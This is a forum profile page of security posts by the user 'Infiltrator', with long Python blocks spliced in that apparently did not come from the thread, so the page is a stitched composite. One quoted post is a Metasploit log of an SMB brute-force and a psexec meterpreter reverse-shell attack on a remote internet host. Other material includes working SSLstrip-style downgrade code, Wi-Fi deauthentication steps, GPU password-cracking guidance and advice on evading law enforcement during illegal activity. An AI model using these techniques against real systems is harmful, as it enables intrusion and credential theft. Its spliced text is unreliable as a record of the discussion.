
Infiltrator

Dedicated Members
  • Posts: 4,287
  • Joined
  • Last visited
  • Days Won: 22

Posts posted by Infiltrator

  1. I know TOR is very slow, but you could use a chain of VPN servers, instead of a DNS server.

    It offers encryption and would increase your anonymity on the web too, but you would have to be careful with browser add-ons or plugins, as they can reveal your real IP address.

    Just a thought.

  2. Hello,

    I would like to know how to use a wireless Alfa card on a BackTrack Live CD or USB. Please suggest something if you have any idea.

    Regards

    Skorpinok.

    As Mr-Protocol stated, plug it in, then issue the command lsusb. It should display the name of your USB wireless adapter Alfa bla bla.

    If it does, the next thing you do is type airmon-ng at the terminal. That will display your adapter chipset, interface name (e.g. wlan0) and your monitor interface (e.g. mon0).

    The ISP I'm buying internet from has 3 DNS servers listed when I do an ipconfig /all (I know, Windows.): 2 OpenDNS servers and a server on the default gateway. I'm trying to bypass their DNS servers, which block some sites due to restrictive policies, and I'm sure they're doing some snooping. I thought about DNS tunneling, but I think that would still be seen by the DNS on the default gateway. I currently have a VPS running SSH and a web proxy set up that I'm tunneling my web traffic through. However, DNS requests are still being handled by the default gateway. Is there any way to completely tunnel my DNS traffic to avoid using their DNS servers? Thank you in advance.

    I would use the Firefox built-in option network.proxy.socks_remote_dns.

    What it does is use the remote DNS server, instead of your local ISP's DNS servers, to do the DNS queries or lookups.

    Now you can use your VPS DNS servers to handle all the DNS work.
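The mechanism behind that Firefox setting, shown as an added example that is not code from the thread or from Firefox: a SOCKS5 proxy such as the one `ssh -D` provides accepts the destination either as a hostname, which the proxy resolves at the far end, or as an IPv4 address the client has already resolved locally. `network.proxy.socks_remote_dns` selects the first form; with it off, the browser asks the local (ISP) resolver for the address before it ever touches the tunnel, which is exactly the leak the question describes. The byte layouts follow RFC 1928; the hostnames and addresses are constructed sample values.

```python
import socket
import struct

# Constructed example: SOCKS5 (RFC 1928) CONNECT requests, the message a
# client sends after method negotiation.  With
# network.proxy.socks_remote_dns = true Firefox sends the hostname
# (ATYP 0x03) and lets the proxy resolve it; with it off the browser
# resolves locally first and sends the IPv4 literal (ATYP 0x01), so the
# DNS query has already reached the ISP resolver before the tunnel
# carries anything.

SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03


def connect_request_remote_dns(hostname: str, port: int) -> bytes:
    """CONNECT carrying the raw hostname; the SOCKS server does the lookup."""
    name = hostname.encode("idna")
    if not 0 < len(name) <= 255:
        raise ValueError("SOCKS5 domain names must be 1..255 bytes")
    header = struct.pack("!BBBB", SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_DOMAIN)
    return header + bytes([len(name)]) + name + struct.pack("!H", port)


def connect_request_local_dns(ipv4: str, port: int) -> bytes:
    """CONNECT carrying an IPv4 literal; the client had to resolve it locally,
    which is the DNS leak network.proxy.socks_remote_dns prevents."""
    header = struct.pack("!BBBB", SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_IPV4)
    return header + socket.inet_aton(ipv4) + struct.pack("!H", port)


def parse_connect_request(req: bytes) -> dict:
    """Decode a CONNECT request as the proxy would; 'leaks_dns' is True when
    the client sent a pre-resolved address instead of a name."""
    if len(req) < 4:
        raise ValueError("truncated SOCKS5 request")
    ver, cmd, rsv, atyp = struct.unpack("!BBBB", req[:4])
    if ver != SOCKS_VERSION or cmd != CMD_CONNECT or rsv != 0x00:
        raise ValueError("not a SOCKS5 CONNECT request")
    if atyp == ATYP_DOMAIN:
        n = req[4]
        name, port = req[5:5 + n], req[5 + n:7 + n]
        if len(name) != n or len(port) != 2:
            raise ValueError("truncated domain-name request")
        return {"atyp": "domain", "host": name.decode("idna"),
                "port": struct.unpack("!H", port)[0], "leaks_dns": False}
    if atyp == ATYP_IPV4:
        if len(req) < 10:
            raise ValueError("truncated IPv4 request")
        return {"atyp": "ipv4", "host": socket.inet_ntoa(req[4:8]),
                "port": struct.unpack("!H", req[8:10])[0], "leaks_dns": True}
    raise ValueError("unsupported address type %#x" % atyp)


if __name__ == "__main__":
    good = connect_request_remote_dns("example.com", 443)
    bad = connect_request_local_dns("93.184.216.34", 443)
    for req in (good, bad):
        print(req.hex(), parse_connect_request(req))
```

To apply this to the VPS in the question: `ssh -D 1080 user@vps` gives a local SOCKS5 listener, Firefox is pointed at it as a SOCKS v5 proxy with network.proxy.socks_remote_dns set to true in about:config, and a packet capture on the local interface should then show no port 53 traffic for the hostnames being browsed.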

    Yeah, but if you use airmon-ng to start your card, I think it sets it to roam. I like setting airodump-ng with -c for the channel number; then aireplay will work on that channel, since I tend to use them in tandem anyway when either cracking WEP or trying to capture WPA handshakes. I keep hearing about wifite though, will have to give that a try. Apparently it works really well for various wifi attacks, including WPS (reaver), WEP and WPA handshake capturing. Not sure on the deauth stuff with it, but I assume it has to do that to get the handshake and trigger replay attacks for IVs.

    I agree with you 100% and I do that too, that was just a suggestion though.

    You can only run your Windows copy unlicensed for 30 days. After the 30-day grace period is over, you must activate your Windows copy in order to continue using it. In addition, to avoid buying licenses, you can make several copies of your first virtual machine and run them as if they were installed individually.

    That's what I did in the past, and I was able to run them without any problems. Furthermore, you will need to change the hostname on each of the VMs, or you will get conflicting error messages saying that there is already another host on the network with the same name.

    There's one thing she forgot to mention that's the key here, because SOMEONE is going to read her article and think "oh, I can just use a proxy, TOR, or a VPN, and I'm safe and anonymous", which really isn't true. At the very basic level, all traffic will come back to you physically at your end point, encrypted or not; it's going to leave a trail in the packets, and your MAC address is going to be in there somewhere. Your ISP, working with any number of law enforcement agencies, if they were doing deep packet inspection, taking control of the networks you proxied or VPNed through, or even the TOR exit nodes (want a list of them?), could still find ways to sniff your identity. The only way to stay truly anonymous is: 1, NEVER do these things from your home; 2, NEVER use your real MAC address when connecting to ANY network when using a service like TOR or a VPN; 3, never use the same access point more than once, and never in public view, near cameras, etc.; 4, use live discs and don't keep a HDD or any storage media with you or on the machine in use other than the RAM in the machine. Cold boot attacks can work to freeze memory and try to extract and dump it, but that's only going to work if you get caught while in the act. A machine with no drives and no external media can't keep records of your information unless the device is powered on. 5, NEVER log in or connect to sites that are tied to you personally. If you are going to be anonymous, you need to make sure you keep it that way, and if someone tracking you sees one of the sites you use logged into from Chicago one day and Kansas the next, they at least know you are accessing the internet, and will just monitor all the sites you use, the email addresses you set up, etc. And lastly, 6, don't speak, either online or offline, to anyone, if or when you decide to go online, about anything you are going to do, nor ever speak of it before or afterwards to anyone.

    If you are planning to do something that is against the law, you never speak of it. Ever. That in itself, no matter what you've tried to do to cover your tracks, is why people end up in jail. You can't be connected to something unless someone knows you are connected to it, so make damn sure no one ever does, whether it be while doing it online or offline. Bragging and blabbing about it across Twitter, Pastebin, IRC and the like is why half these kids who think they're "anonymous" end up in jail.

    Everything you do generates a trail of bits, because if it didn't, traffic would have no way to know where to send it back to you. And while you can make it harder for people to put the pieces of the puzzle together, you make it easier if you do all of this from your home, or the same location every time. Even when using proxies, VPNs, TOR, SSH tunnels and IRC bouncers, it can all be traced eventually, and if you stay in one place long enough, and someone with the time and resources truly wanted to get to you, they could.

    Bravo Digip. Follow these steps and I am sure they will have a hard time finding you.

  7. Hi, if I use aireplay-ng -0 10 -a <mac of access point> name mon0 it scans on the wrong channel. How do I ensure it scans on channel 1, say? :unsure:

    If you are going to hack a single wireless router, you can set the channel on your adapter beforehand by issuing these commands:

    [CODE]
    # take the interface down before changing its channel
    ifconfig wlan0 down
    # lock the adapter to channel 1 (the target AP's channel)
    iwconfig wlan0 channel 1
    # bring it back up
    ifconfig wlan0 up
    [/CODE]

  8. http://www.debuntu.o...ub#comment-1489 )

    I've actually had to do this before, and can't remember the exact steps I used with BackTrack, but either of the above should do it.

    Yep, that's exactly what I had to do the other day to reset my BackTrack password. That article Digip suggested has all the steps outlined in it. Just follow them and you can't go wrong.

    The other option would be booting a Live CD, mounting the partitions and then chrooting into it to change the password; this would be the easiest one.

    http://www.howtogeek.com/howto/linux/reset-your-ubuntu-password-easily-from-the-live-cd/

  9. Hello,

    So I have been running BackTrack 5 R3 in Oracle for a little bit now and have not been able to get seamless mode to work, which is annoying. Then I tried running BT in VMware Player and was able to at least change the screen resolution so that it fit the entire screen. But in Oracle I have no screen resolution settings; has anyone else had this problem? Anyone have any fixes?

    Be it VMware or VirtualBox, you must always install the additional tools if you want to adjust the screen resolution or whatever.

  10. Infiltrator,

    Thanks for the reply, but my problem/question is not the SQL injection part, but a man-in-the-middle attack or some way in which a hacker could eavesdrop on the connection.

    Rephrasing the original question:

    What are the ways someone can eavesdrop on / change data on an SSL connection by being on the route of the packet or having the user's computer infected?

    Roger, brother, thank you for clearing that up. One way to eavesdrop on an SSL connection is using SSLstrip, part of the BackTrack OS. I would suggest reading up on that if you are not familiar with the utility.

    Other methods would be infecting the client side with malware to intercept the SSL connection and then decrypt the messages.

    Here are some interesting articles for you to read.

    http://thehackernews.com/2012/04/90-ssl-sites-vulnerable-to-beast-ssl.html#sthash.cAHE3DbD.dpbs

    http://nbnl.globalwhelming.com/2011/09/20/researchers-cracked-ssl-internet-safe-https/

    http://www.marktaw.com/technology/HowlongdoesittaketocrackS.html
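To make concrete what SSLstrip does on the wire, here is an added illustration in Python that is neither the thread's nor the SSLstrip project's code: an interposed proxy that rewrites https:// references in the page body to http://, remembers the mapping so it can still fetch the genuine https URL upstream, and drops the Strict-Transport-Security header and the cookie Secure flag that would otherwise stop the downgrade. The page body, headers and host names are constructed samples, and the HSTS cache check at the end is a simplified model of the browser-side defence, not a browser implementation.

```python
import re

# Constructed sample of what an interposed proxy sees coming back from the
# real (https) server, before forwarding it to the victim over plain http.
SAMPLE_BODY = (
    '<a href="https://bank.example/login">Log in</a>\n'
    "<form action='https://bank.example/auth' method='post'>\n"
    '<script src="https://cdn.example/app.js"></script>'
)
SAMPLE_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "sid=abc123; Secure; HttpOnly",
}

HTTPS_REF = re.compile(r"https://([^\s\"'<>]+)", re.IGNORECASE)


def downgrade_body(html: str, seen: dict) -> str:
    """Rewrite every https:// reference to http:// and record the mapping so
    the proxy can still open the genuine https URL on the victim's behalf."""
    def swap(m):
        plain = "http://" + m.group(1)
        seen[plain] = m.group(0)
        return plain
    return HTTPS_REF.sub(swap, html)


def downgrade_headers(headers: dict) -> dict:
    """Remove what would make the browser insist on TLS: the HSTS header and
    the Secure attribute on cookies (otherwise the cookie is never sent over
    the plain-http link the victim now follows)."""
    out = {}
    for name, value in headers.items():
        key = name.lower()
        if key == "strict-transport-security":
            continue
        if key == "set-cookie":
            value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
        out[name] = value
    return out


def upstream_url(requested: str, seen: dict) -> str:
    """Map a plain-http URL the victim requests back to the real https one."""
    return seen.get(requested, requested)


def browser_accepts_plain_http(host: str, hsts_cache: set) -> bool:
    """Simplified model of the client-side defence: a browser that already
    holds an HSTS entry for the host (from an earlier clean visit or the
    preload list) rewrites http:// to https:// itself, so the stripped link
    never leaves the machine in the clear."""
    return host not in hsts_cache


if __name__ == "__main__":
    seen = {}
    print(downgrade_body(SAMPLE_BODY, seen))
    print(downgrade_headers(SAMPLE_HEADERS))
    print(upstream_url("http://bank.example/login", seen))
    print(browser_accepts_plain_http("bank.example", {"bank.example"}))
```

The attack only works on the victim's first, un-pinned visit: a site that sends HSTS over a clean https connection, or that is on the browser preload list, is refused over plain http and the rewritten link is upgraded before it is sent.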

  11. Target OS: Windows 2003 SP2 EN

    Target public ip : XX.XX.XX.XX

    Target Open port: 445

    My OS: windows 7

    My public ip : YY.YY.YY.YY

    my local ip: 192.168.2.42

    my router SMC

    Due to the fact that the target is not on the same LAN, and the attack will be over the internet, I start by setting a port forward in the router settings as follows:

    Name: AUTH - Protocol: TCP/UDP - WAN Port: 4444 - Server Host Port: 4444 - Server IP Address: 192.168.2.42

    I installed Metasploit and started by checking whether the credentials are valid or not by running scanner/smb/smb_login as follows:

    msf> use scanner/smb/smb_login

    msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

    rhosts => XX.XX.XX.XX

    msf auxiliary(smb_login) > set smbuser root

    smbuser => root

    msf auxiliary(smb_login) > set smbpass password

    smbpass => password

    msf auxiliary(smb_login) > run

    [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

    [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

    [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

    [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

    [*] Auth-User: "root"

    [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    Then, after the successful login, I try to use exploit/windows/smb/psexec to exploit the server as follows:

    msf > use exploit/windows/smb/psexec

    msf exploit(psexec) > set rhost XX.XX.XX.XX

    rhost => XX.XX.XX.XX

    msf exploit(psexec) > set smbuser root

    smbuser => root

    msf exploit(psexec) > set smbpass password

    smbpass => password

    msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf exploit(psexec) > set lhost YY.YY.YY.YY

    lhost => YY.YY.YY.YY

    msf exploit(psexec) > set lport 4444

    lport => 4444

    msf exploit(psexec) > exploit

    [-] Handler failed to bind to YY.YY.YY.YY:4444

    [*] Started reverse handler on 0.0.0.0:4444

    [*] Connecting to the server...

    [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

    [*] Uploading payload...

    [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

    But as you see, the exploit failed although the credentials are valid and confirmed above; can you help me understand what's wrong in the above?

    I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

    http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

  12. Bruteforcing is the surefire method.

    Instead of CPU processed bruteforcing, we can process bruteforcing through the GPU in order to arrive at a rate of about 380M * 1.4M passwords per second, allowing us to guess a 7-character password in maybe 1-2 days. In this sense, the GPU works with a package called CUDA, available for downloading from nVidia. Certainly we would need to have the hashed versions of the passwords beforehand.

    Search for GPU CUDA BRUTEFORCE PASSWORDS or similar

    There are many paid and free projects that use bruteforcing processed on the GPU. I think this is what you wanted to know by your inquiry: "how the password crackers get the hash code".

    Cryptohaze is one of the projects which function in this way.

    https://www.cryptoha...multiforcer.php

    I personally like Cryptohaze a lot, but have found it to be slower than Hashcat. Cryptohaze uses Nvidia, which is a lot slower than ATI in this respect, so I would recommend Hashcat instead. Hashcat also supports distributed networking, which can push the performance envelope to the extreme.
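As an added worked calculation that is not from the post, the following Python checks the "7-character password in maybe 1-2 days" figure against the 380M guesses per second the post quotes and extends it to other character sets and lengths. It assumes a fast, unsalted hash on which the guess rate stays constant, and that the attacker already has the hashes, as the post says; the charset sizes are the usual ones for digits, lowercase, alphanumeric and printable ASCII, and the function names are mine.

```python
# Character-set sizes used below.  The post's 380M/s is a single-GPU rate
# against a fast, unsalted hash, i.e. the best case for the attacker.
CHARSETS = {
    "digits": 10,
    "lowercase": 26,
    "alphanumeric": 62,
    "printable ASCII": 95,
}
POST_RATE = 380_000_000  # guesses per second quoted in the post
SECONDS_PER_DAY = 86_400


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates for a password of exactly `length` characters."""
    return charset_size ** length


def days_to_exhaust(charset_size: int, length: int, rate: float) -> float:
    """Worst case for the attacker: every candidate tried once."""
    return keyspace(charset_size, length) / rate / SECONDS_PER_DAY


def cracking_table(rate: float = POST_RATE, lengths=(6, 7, 8, 9)) -> list:
    """(charset, length, keyspace, days) rows for a quick comparison."""
    return [(name, n, keyspace(size, n), days_to_exhaust(size, n, rate))
            for name, size in CHARSETS.items() for n in lengths]


def min_length_surviving(charset_size: int, rate: float, horizon_days: float) -> int:
    """Shortest length whose full keyspace takes longer than the horizon at
    this rate, i.e. what a password policy needs against this rig."""
    n = 1
    while days_to_exhaust(charset_size, n, rate) <= horizon_days:
        n += 1
    return n


if __name__ == "__main__":
    for name, n, space, days in cracking_table():
        print(f"{name:16} len {n}: {space:>22,d} candidates, {days:12.3f} days")
    print("printable length that outlasts a year at the post's rate:",
          min_length_surviving(95, POST_RATE, 365))
```

At 380M/s the full printable-ASCII keyspace for 7 characters (95^7) takes about 2.1 days, which is the post's figure; 7 lowercase letters fall in about 21 seconds, and only 9 printable characters outlast a year of exhaustive search on that one rig. Salting does not change these numbers per hash, but a slow password hash (bcrypt, scrypt, Argon2) cuts the rate by orders of magnitude.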

  13. Let me elaborate my problem.

    I am thinking of making an online polling/voting system. I am a senior software engineer so I can secure the database and the web page from sql injections, xss, csrf and I'm also thinking of a secure system to 'anonymously' identify the user so he/she can vote once, BUT, my main problem is this:

    could a hacker create some software to hijack the session or .... in order to steal the vote?

    Well, if you want to secure your database system against SQL injection attacks, I would recommend using open source tools such as SQLMap to attack your web application. If the tool is successful in penetrating your database, you will need to write better code to address the security problem.

    The reason why websites are so vulnerable to these web-based attacks is because they are never 100% tested against these attacks in the first place. If they were, we wouldn't be seeing such an alarming rate of websites being exploited in this manner.
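As an added example that is not from the thread: the "has this token already voted" check such a system would run, written first the vulnerable way SQLMap is built to find and then with bound parameters, against an in-memory SQLite table with constructed sample rows. The schema, token format and function names are assumptions for illustration. The point is that the injected string `nobody' OR '1'='1` makes the first version report a never-used token as already spent (a vote denied), while the second treats it as an ordinary, unknown token.

```python
import sqlite3

# Constructed sample data: one-time voting tokens that have already been spent.
SAMPLE_VOTES = [("tok-a1", "alice"), ("tok-b2", "bob"), ("tok-c3", "alice")]


def make_db() -> sqlite3.Connection:
    """In-memory table; the PRIMARY KEY on token enforces one vote per token."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE votes (token TEXT PRIMARY KEY, choice TEXT NOT NULL)")
    conn.executemany("INSERT INTO votes VALUES (?, ?)", SAMPLE_VOTES)
    conn.commit()
    return conn


def has_voted_vulnerable(conn: sqlite3.Connection, token: str) -> bool:
    """The token is pasted into the SQL text, so it can rewrite the WHERE
    clause; this is the pattern SQLMap exists to detect."""
    sql = "SELECT COUNT(*) FROM votes WHERE token = '%s'" % token
    return conn.execute(sql).fetchone()[0] > 0


def has_voted_fixed(conn: sqlite3.Connection, token: str) -> bool:
    """Bound parameter: the driver sends the token as data, never as SQL."""
    row = conn.execute("SELECT COUNT(*) FROM votes WHERE token = ?", (token,)).fetchone()
    return row[0] > 0


def record_vote_fixed(conn: sqlite3.Connection, token: str, choice: str) -> bool:
    """Insert with bound parameters; a second vote with the same token hits
    the PRIMARY KEY and is rejected by the database itself, so the check and
    the insert cannot race with each other."""
    try:
        with conn:  # commits on success, rolls back on exception
            conn.execute("INSERT INTO votes VALUES (?, ?)", (token, choice))
        return True
    except sqlite3.IntegrityError:
        return False


def tally(conn: sqlite3.Connection) -> dict:
    """Votes per choice."""
    return dict(conn.execute("SELECT choice, COUNT(*) FROM votes GROUP BY choice"))


if __name__ == "__main__":
    conn = make_db()
    payload = "nobody' OR '1'='1"
    print("vulnerable check:", has_voted_vulnerable(conn, payload))
    print("fixed check:     ", has_voted_fixed(conn, payload))
    print(record_vote_fixed(conn, "tok-d4", "bob"), record_vote_fixed(conn, "tok-d4", "alice"))
    print(tally(conn))
```

Running SQLMap against the first form with the token as the injectable parameter finds a boolean-based injection immediately; against the second it finds nothing, because there is no string concatenation for it to break out of.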

  14. You can still practice all of what you learned in the lab from your own PC. Of course, having all that Cisco gear gives you hands-on experience, but you can accomplish the same with Packet Tracer or GNS3.

    They are virtual network software that allows you to create your own network environment and practice as if you were working with the real stuff.

    Once you have all the nodes, routers and switches configured, you can then use them to simulate a real network. You can also configure the routers and switches via a terminal, just like you would with a real Cisco router or switch.

    The only difference is that you don't use a serial cable to connect your PC to the router or switch; it's all done via the console.

    In case you are wondering, I've also done my CCNA, but it's been a while. I am planning on doing Network+ once I finish studying for my Security+.
